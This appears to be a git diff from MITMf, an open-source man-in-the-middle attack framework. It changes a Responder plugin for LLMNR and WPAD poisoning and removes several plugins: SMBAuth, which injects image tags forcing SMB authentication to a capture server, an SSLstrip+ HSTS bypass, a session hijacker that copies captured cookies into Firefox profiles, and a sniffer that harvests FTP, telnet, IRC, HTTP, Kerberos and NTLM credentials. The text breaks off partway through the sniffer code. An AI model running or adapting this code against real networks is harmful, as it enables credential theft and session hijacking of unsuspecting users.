options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
|
||||
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
|
||||
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
|
||||
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
|
||||
|
||||
def _should_replace(self, ip, hn, mime):
|
||||
return mime.find(self.mime) != -1
|
||||
|
||||
def _get_req_info(self, request):
|
||||
ip = request.client.getClientIP()
|
||||
hn = request.client.getRequestHostname()
|
||||
mime = request.client.headers['Content-Type']
|
||||
|
||||
return (ip, hn, mime)
|
|
@ -23,9 +23,10 @@ import os
|
|||
import threading
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from libs.responder.Responder import ResponderMITMf
|
||||
from core.sslstrip.DnsCache import DnsCache
|
||||
from twisted.internet import reactor
|
||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
||||
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
||||
from core.utils import SystemConfig
|
||||
|
||||
class Responder(Plugin):
|
||||
name = "Responder"
|
||||
|
@ -37,37 +38,32 @@ class Responder(Plugin):
|
|||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.options = options
|
||||
self.interface = options.interface
|
||||
self.ourip = SystemConfig.getIP(options.interface)
|
||||
|
||||
try:
|
||||
config = options.configfile['Responder']
|
||||
config = self.config['Responder']
|
||||
except Exception, e:
|
||||
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||
|
||||
if options.Analyze:
|
||||
LLMNRPoisoner().start(options, self.ourip)
|
||||
|
||||
if options.wpad:
|
||||
WPADPoisoner().start()
|
||||
|
||||
if options.analyze:
|
||||
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
|
||||
|
||||
resp = ResponderMITMf()
|
||||
resp.setCoreVars(options, config)
|
||||
|
||||
result = resp.AnalyzeICMPRedirect()
|
||||
if result:
|
||||
for line in result:
|
||||
self.tree_output.append(line)
|
||||
|
||||
resp.printDebugInfo()
|
||||
resp.start()
|
||||
|
||||
def plugin_reactor(self, strippingFactory):
|
||||
def pluginReactor(self, strippingFactory):
|
||||
reactor.listenTCP(3141, strippingFactory)
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
||||
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
|
||||
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
|
||||
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
|
||||
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
|
||||
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
||||
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
|
||||
options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
||||
options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||
options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
|
||||
options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
|
||||
options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
|
||||
options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
|
||||
options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
||||
options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
|
||||
|
|
|
@ -1,49 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
import sys
|
||||
import logging
|
||||
|
||||
class SMBAuth(Inject, Plugin):
|
||||
name = "SMBAuth"
|
||||
optname = "smbauth"
|
||||
desc = "Evoke SMB challenge-response auth attempts"
|
||||
depends = ["Inject"]
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
Inject.initialize(self, options)
|
||||
self.target_ip = options.host
|
||||
|
||||
if not self.target_ip:
|
||||
self.target_ip = options.ip_address
|
||||
|
||||
self.html_payload = self._get_data()
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
|
||||
|
||||
def _get_data(self):
|
||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
||||
'<img src=\"file://///%s\\image.jpg\">'\
|
||||
'<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">' % tuple([self.target_ip]*3)
|
|
@ -1,56 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import sys
|
||||
import logging
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from core.utils import IpTables
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
class HSTSbypass(Plugin):
|
||||
name = 'SSLstrip+'
|
||||
optname = 'hsts'
|
||||
desc = 'Enables SSLstrip+ for partial HSTS bypass'
|
||||
version = "0.4"
|
||||
tree_output = ["SSLstrip+ by Leonardo Nve running"]
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.manualiptables = options.manualiptables
|
||||
|
||||
try:
|
||||
hstsconfig = options.configfile['SSLstrip+']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
|
||||
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().dns is False:
|
||||
IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port'])
|
||||
|
||||
URLMonitor.getInstance().setHstsBypass(hstsconfig)
|
||||
DNSChef.getInstance().setHstsBypass(hstsconfig)
|
||||
|
||||
def finish(self):
|
||||
if not self.manualiptables:
|
||||
if IpTables.getInstance().dns is True:
|
||||
IpTables.getInstance().Flush()
|
|
@ -1,187 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from core.publicsuffix.publicsuffix import PublicSuffixList
|
||||
from urlparse import urlparse
|
||||
import threading
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
import logging
|
||||
import sqlite3
|
||||
import json
|
||||
import socket
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class SessionHijacker(Plugin):
|
||||
name = "Session Hijacker"
|
||||
optname = "hijack"
|
||||
desc = "Performs session hijacking attacks against clients"
|
||||
implements = ["cleanHeaders"] #["handleHeader"]
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.psl = PublicSuffixList()
|
||||
self.firefox = options.firefox
|
||||
self.mallory = options.mallory
|
||||
self.save_dir = "./logs"
|
||||
self.seen_hosts = {}
|
||||
self.sql_conns = {}
|
||||
self.sessions = []
|
||||
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"
|
||||
|
||||
#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
|
||||
#SQLite version 3.7.0 or later. You won't be able to read the database files
|
||||
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
|
||||
#or is not a database" message.
|
||||
|
||||
sqlv = sqlite3.sqlite_version.split('.')
|
||||
if (sqlv[0] <3 or sqlv[1] < 7):
|
||||
sys.exit("[-] sqlite3 version 3.7 or greater required")
|
||||
|
||||
if not os.path.exists("./logs"):
|
||||
os.makedirs("./logs")
|
||||
|
||||
if self.mallory:
|
||||
t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def cleanHeaders(self, request): # Client => Server
|
||||
headers = request.getAllHeaders().copy()
|
||||
client_ip = request.getClientIP()
|
||||
|
||||
if 'cookie' in headers:
|
||||
|
||||
if self.firefox:
|
||||
url = "http://" + headers['host'] + request.getPathFromUri()
|
||||
for cookie in headers['cookie'].split(';'):
|
||||
eq = cookie.find("=")
|
||||
cname = str(cookie)[0:eq].strip()
|
||||
cvalue = str(cookie)[eq+1:].strip()
|
||||
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
|
||||
|
||||
mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)
|
||||
|
||||
if self.mallory:
|
||||
if len(self.sessions) > 0:
|
||||
temp = []
|
||||
for session in self.sessions:
|
||||
temp.append(session[0])
|
||||
if headers['host'] not in temp:
|
||||
self.sessions.append((headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||
else:
|
||||
self.sessions.append((headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||
|
||||
#def handleHeader(self, request, key, value): # Server => Client
|
||||
# if 'set-cookie' in request.client.headers:
|
||||
# cookie = request.client.headers['set-cookie']
|
||||
# #host = request.client.headers['host'] #wtf????
|
||||
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
|
||||
# if self.urlMonitor.isClientLogging() is True:
|
||||
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
|
||||
# else:
|
||||
# mitmf_logger.info(message)
|
||||
|
||||
def mallory_server(self):
|
||||
host = ''
|
||||
port = 20666
|
||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
server.bind((host,port))
|
||||
server.listen(1)
|
||||
while True:
|
||||
client, addr = server.accept()
|
||||
if addr[0] != "127.0.0.1":
|
||||
client.send("Hacked By China!")
|
||||
client.close()
|
||||
continue
|
||||
request = client.recv(8192)
|
||||
request = request.split('\n')
|
||||
path = request[0].split()[1]
|
||||
client.send("HTTP/1.0 200 OK\r\n")
|
||||
client.send("Content-Type: text/html\r\n\r\n")
|
||||
if path == "/":
|
||||
client.send(json.dumps(self.sessions))
|
||||
client.close()
|
||||
|
||||
def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
|
||||
|
||||
session_dir=self.save_dir + "/" + ip
|
||||
cookie_file=session_dir +'/cookies.sqlite'
|
||||
cookie_file_exists = os.path.exists(cookie_file)
|
||||
|
||||
if (ip not in (self.sql_conns and os.listdir("./logs"))):
|
||||
|
||||
try:
|
||||
if not os.path.exists(session_dir):
|
||||
os.makedirs(session_dir)
|
||||
|
||||
db = sqlite3.connect(cookie_file, isolation_level=None)
|
||||
self.sql_conns[ip] = db.cursor()
|
||||
|
||||
if not cookie_file_exists:
|
||||
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
|
||||
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
|
||||
except Exception, e:
|
||||
print str(e)
|
||||
|
||||
scheme = urlparse(url).scheme
|
||||
scheme = (urlparse(url).scheme)
|
||||
basedomain = self.psl.get_public_suffix(host)
|
||||
address = urlparse(url).hostname
|
||||
short_url = scheme + "://"+ address
|
||||
|
||||
log = open(session_dir + '/visited.html','a')
|
||||
if (ip not in self.seen_hosts):
|
||||
self.seen_hosts[ip] = {}
|
||||
log.write(self.html_header)
|
||||
|
||||
if (address not in self.seen_hosts[ip]):
|
||||
self.seen_hosts[ip][address] = 1
|
||||
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))
|
||||
|
||||
log.close()
|
||||
|
||||
if address == basedomain:
|
||||
address = "." + address
|
||||
|
||||
expire_date = 2000000000 #Year2033
|
||||
now = int(time.time()) - 600
|
||||
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
|
||||
options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')
|
||||
|
||||
def finish(self):
|
||||
if self.firefox:
|
||||
print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"
|
|
@ -1,815 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||
from scapy.all import *
|
||||
from sys import exit
|
||||
from collections import OrderedDict
|
||||
from StringIO import StringIO
|
||||
import binascii
|
||||
import struct
|
||||
import pcap
|
||||
import base64
|
||||
import threading
|
||||
import re
|
||||
import os
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Sniffer(Plugin):
|
||||
name = "Sniffer"
|
||||
optname = "sniffer"
|
||||
desc = "Sniffs for various protocol login and auth attempts"
|
||||
tree_output = ["Net-Creds online"]
|
||||
implements = ["sendRequest"]
|
||||
version = "0.1"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.interface = options.interface
|
||||
#self.parse = options.parse
|
||||
|
||||
#these field names were stolen from the etter.fields file (Ettercap Project)
|
||||
self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
|
||||
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
|
||||
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
|
||||
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
|
||||
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
|
||||
|
||||
self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
|
||||
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
|
||||
'passwort', 'passwrd', 'wppassword', 'upasswd']
|
||||
|
||||
if os.geteuid() != 0:
|
||||
sys.exit("[-] Sniffer plugin requires root privileges")
|
||||
|
||||
n = NetCreds()
|
||||
#if not self.parse:
|
||||
t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,))
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
#else:
|
||||
# pcap = rdpcap(self.parse)
|
||||
# for pkt in pcap:
|
||||
# n.pkt_parser(pkt)
|
||||
|
||||
#def add_options(self, options):
|
||||
# options.add_argument('--parse', dest='parse', type=str, default=None, help='Parse pcap')
|
||||
|
||||
def sendRequest(self, request):
|
||||
#Capture google searches
|
||||
if ('google' in request.headers['host']):
|
||||
if ('search' in request.uri):
|
||||
self.captureQueries('q', request)
|
||||
|
||||
#Capture bing searches
|
||||
if ('bing' in request.headers['host']):
|
||||
if ('Suggestions' in request.uri):
|
||||
self.captureQueries('qry', request)
|
||||
|
||||
#Capture yahoo searches
|
||||
if ('search.yahoo' in request.headers['host']):
|
||||
if ('nresults' in request.uri):
|
||||
self.captureQueries('command', request)
|
||||
|
||||
self.captureURLCreds(request)
|
||||
|
||||
def captureQueries(self, search_param, request):
|
||||
try:
|
||||
for param in request.uri.split('&'):
|
||||
if param.split('=')[0] == search_param:
|
||||
query = str(param.split('=')[1])
|
||||
if query:
|
||||
mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query))
|
||||
except Exception, e:
|
||||
error = str(e)
|
||||
mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error)
|
||||
|
||||
def captureURLCreds(self, request):
|
||||
'''
|
||||
checks for creds passed via GET requests or just in the url
|
||||
It's surprising to see how many people still do this (please stahp)
|
||||
'''
|
||||
|
||||
url = request.uri
|
||||
|
||||
username = None
|
||||
password = None
|
||||
for user in self.http_userfields:
|
||||
#search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE)
|
||||
search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE)
|
||||
if search:
|
||||
username = search.group()
|
||||
|
||||
for passw in self.http_passfields:
|
||||
#search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE)
|
||||
search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE)
|
||||
if search:
|
||||
password = search.group()
|
||||
|
||||
if (username and password):
|
||||
mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url))
|
||||
|
||||
class NetCreds:
|
||||
|
||||
def __init__(self):
|
||||
self.pkt_frag_loads = OrderedDict()
|
||||
self.challenge_acks = OrderedDict()
|
||||
self.mail_auths = OrderedDict()
|
||||
self.telnet_stream = OrderedDict()
|
||||
|
||||
# Regexs
|
||||
self.authenticate_re = '(www-|proxy-)?authenticate'
|
||||
self.authorization_re = '(www-|proxy-)?authorization'
|
||||
self.ftp_user_re = r'USER (.+)\r\n'
|
||||
self.ftp_pw_re = r'PASS (.+)\r\n'
|
||||
self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
|
||||
self.irc_pw_re = r'NS IDENTIFY (.+)'
|
||||
self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
|
||||
self.mail_auth_re1 = '(\d+ )?login '
|
||||
self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
|
||||
self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
|
||||
|
||||
def start(self, interface):
|
||||
try:
|
||||
sniff(iface=interface, prn=self.pkt_parser, store=0)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def frag_remover(self, ack, load):
|
||||
'''
|
||||
Keep the FILO OrderedDict of frag loads from getting too large
|
||||
3 points of limit:
|
||||
Number of ip_ports < 50
|
||||
Number of acks per ip:port < 25
|
||||
Number of chars in load < 5000
|
||||
'''
|
||||
|
||||
# Keep the number of IP:port mappings below 50
|
||||
# last=False pops the oldest item rather than the latest
|
||||
while len(self.pkt_frag_loads) > 50:
|
||||
self.pkt_frag_loads.popitem(last=False)
|
||||
|
||||
# Loop through a deep copy dict but modify the original dict
|
||||
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||
# Keep 25 ack:load's per ip:port
|
||||
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||
self.pkt_frag_loads[ip_port].popitem(last=False)
|
||||
|
||||
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
# Keep the load less than 75,000 chars
|
||||
for ack in copy_pkt_frag_loads[ip_port]:
|
||||
# If load > 5000 chars, just keep the last 200 chars
|
||||
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||
self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:]
|
||||
|
||||
def frag_joiner(self, ack, src_ip_port, load):
|
||||
'''
|
||||
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||
'''
|
||||
for ip_port in self.pkt_frag_loads:
|
||||
if src_ip_port == ip_port:
|
||||
if ack in self.pkt_frag_loads[src_ip_port]:
|
||||
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||
old_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||
concat_load = old_load + load
|
||||
return OrderedDict([(ack, concat_load)])
|
||||
|
||||
return OrderedDict([(ack, load)])
|
||||
|
||||
def pkt_parser(self, pkt):
|
||||
'''
|
||||
Start parsing packets here
|
||||
'''
|
||||
|
||||
if pkt.haslayer(Raw):
|
||||
load = pkt[Raw].load
|
||||
|
||||
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
|
||||
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
|
||||
return
|
||||
|
||||
# UDP
|
||||
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
|
||||
|
||||
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
|
||||
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
|
||||
|
||||
# SNMP community strings
|
||||
if pkt.haslayer(SNMP):
|
||||
self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
|
||||
return
|
||||
|
||||
# Kerberos over UDP
|
||||
decoded = self.Decode_Ip_Packet(str(pkt)[14:])
|
||||
kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:])
|
||||
if kerb_hash:
|
||||
self.printer(src_ip_port, dst_ip_port, kerb_hash)
|
||||
|
||||
# TCP
|
||||
elif pkt.haslayer(TCP) and pkt.haslayer(Raw):
|
||||
|
||||
ack = str(pkt[TCP].ack)
|
||||
seq = str(pkt[TCP].seq)
|
||||
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
|
||||
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
|
||||
self.frag_remover(ack, load)
|
||||
self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load)
|
||||
full_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||
|
||||
# Limit the packets we regex to increase efficiency
|
||||
# 750 is a bit arbitrary but some SMTP auth success pkts
|
||||
# are 500+ characters
|
||||
if 0 < len(full_load) < 750:
|
||||
|
||||
# FTP
|
||||
ftp_creds = self.parse_ftp(full_load, dst_ip_port)
|
||||
if len(ftp_creds) > 0:
|
||||
for msg in ftp_creds:
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
return
|
||||
|
||||
# Mail
|
||||
mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
|
||||
|
||||
# IRC
|
||||
irc_creds = self.irc_logins(full_load)
|
||||
if irc_creds != None:
|
||||
self.printer(src_ip_port, dst_ip_port, irc_creds)
|
||||
return
|
||||
|
||||
# Telnet
|
||||
self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
||||
#if telnet_creds != None:
|
||||
# printer(src_ip_port, dst_ip_port, telnet_creds)
|
||||
# return
|
||||
|
||||
# HTTP and other protocols that run on TCP + a raw load
|
||||
self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
|
||||
|
||||
def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq):
|
||||
'''
|
||||
Catch telnet logins and passwords
|
||||
'''
|
||||
|
||||
msg = None
|
||||
|
||||
if src_ip_port in self.telnet_stream:
|
||||
# Do a utf decode in case the client sends telnet options before their username
|
||||
# No one would care to see that
|
||||
try:
|
||||
self.telnet_stream[src_ip_port] += load.decode('utf8')
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
|
||||
# \r or \r\n terminate commands in telnet if my pcaps are to be believed
|
||||
if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]:
|
||||
telnet_split = self.telnet_stream[src_ip_port].split(' ', 1)
|
||||
cred_type = telnet_split[0]
|
||||
value = telnet_split[1].replace('\r\n', '').replace('\r', '')
|
||||
# Create msg, the return variable
|
||||
msg = 'Telnet %s: %s' % (cred_type, value)
|
||||
del self.telnet_stream[src_ip_port]
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
|
||||
# This part relies on the telnet packet ending in
|
||||
# "login:", "password:", or "username:" and being <750 chars
|
||||
# Haven't seen any false+ but this is pretty general
|
||||
# might catch some eventually
|
||||
# maybe use dissector.py telnet lib?
|
||||
if len(self.telnet_stream) > 100:
|
||||
self.telnet_stream.popitem(last=False)
|
||||
mod_load = load.lower().strip()
|
||||
if mod_load.endswith('username:') or mod_load.endswith('login:'):
|
||||
self.telnet_stream[dst_ip_port] = 'username '
|
||||
elif mod_load.endswith('password:'):
|
||||
self.telnet_stream[dst_ip_port] = 'password '
|
||||
|
||||
def ParseMSKerbv5TCP(self, Data):
|
||||
'''
|
||||
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
|
||||
Maybe replace this eventually with the kerberos python lib
|
||||
Parses Kerberosv5 hashes from packets
|
||||
'''
|
||||
try:
|
||||
MsgType = Data[21:22]
|
||||
EncType = Data[43:44]
|
||||
MessageType = Data[32:33]
|
||||
